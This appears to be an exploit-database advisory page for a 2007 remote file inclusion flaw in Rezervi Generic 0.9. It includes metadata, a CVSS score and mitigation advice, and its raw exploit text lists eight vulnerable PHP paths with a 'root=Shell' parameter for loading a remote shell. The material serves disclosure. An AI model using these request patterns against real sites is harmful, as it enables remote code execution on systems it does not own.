header-logo
Suggest Exploit
vendor:
Rezervi Generic
by:
GolD_M
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Rezervi Generic
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Rezervi Generic 0.9(root) Remote File Include Vulnerabilities

The Rezervi Generic 0.9 script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file via the 'root' parameter in various files within the templates and belegungsplan directories. This allows the attacker to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and properly validate file inclusion paths. Additionally, keeping the script and all its dependencies up to date with the latest security patches is advised.
Source

Exploit-DB raw data:

# Rezervi Generic 0.9(root)Remote File Include Vulnerablities
# D.Script: http://www.rezervi.com/www/german/download/rezerviGenericV0_9.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/templates/datumVonDatumBis.inc.php?root=Shell
# Exploit:[Path]/templates/footer.inc.php?root=Shell
# Exploit:[Path]/templates/header.inc.php?root=Shell
# Exploit:[Path]/templates/stylesheets.php?root=Shell
# Exploit:[Path]/belegungsplan/wochenuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/monatsuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/jahresuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/tagesuebersicht.inc.php?root=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx To : RootShell-Team.Info & Alkomandoz Hacker 

# milw0rm.com [2007-04-18]